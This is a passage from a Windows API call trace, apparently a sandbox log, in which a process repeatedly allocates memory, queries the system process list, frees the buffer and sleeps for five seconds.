SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0208.021] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0208.022] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0208.024] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0208.024] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0208.025] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0208.025] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0208.026] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0208.172] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0208.173] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0208.175] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0208.175] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0208.176] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0208.176] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0208.176] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0208.282] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0208.283] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0208.285] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0208.285] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0208.286] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0208.287] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0208.287] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0208.539] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0208.565] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0208.567] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0208.567] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0208.568] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0208.569] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0208.569] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0208.746] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0208.747] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0208.750] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0208.750] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0208.752] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0208.752] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0208.752] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0208.907] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0208.908] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0208.916] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0208.917] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0208.918] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0208.919] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0208.919] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0209.089] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.090] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0209.091] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0209.092] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0209.095] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0209.095] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0209.096] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0209.205] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.206] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0209.207] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0209.207] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0209.208] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0209.209] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0209.209] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0209.317] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.317] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0209.319] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0209.319] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0209.320] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0209.320] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0209.321] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0209.425] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.426] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0209.427] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0209.427] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0209.428] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0209.429] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0209.429] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0209.557] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.557] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0209.559] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0209.559] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0209.560] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0209.560] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0209.560] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0209.706] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.706] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0209.708] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0209.708] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0209.709] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0209.709] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0209.709] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0209.810] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.810] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0209.812] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0209.812] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0209.813] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0209.813] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0209.813] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0209.919] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.920] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0209.923] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0209.923] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0209.924] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0209.924] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0209.924] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0210.027] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.028] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0210.029] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0210.029] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0210.030] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0210.030] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0210.920] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0211.100] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.100] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0211.102] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0211.103] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0211.103] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0211.104] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0211.104] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0211.209] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.209] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0211.211] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0211.211] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0211.212] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0211.212] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0211.212] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0211.374] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.375] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0211.377] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0211.378] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0211.379] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0211.379] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0211.379] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0211.495] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.496] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0211.497] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0211.497] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0211.498] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0211.499] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0211.499] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0211.610] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.610] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0211.612] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0211.612] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0211.613] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0211.613] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0211.613] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0211.725] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.725] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0211.727] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0211.727] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0211.728] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, 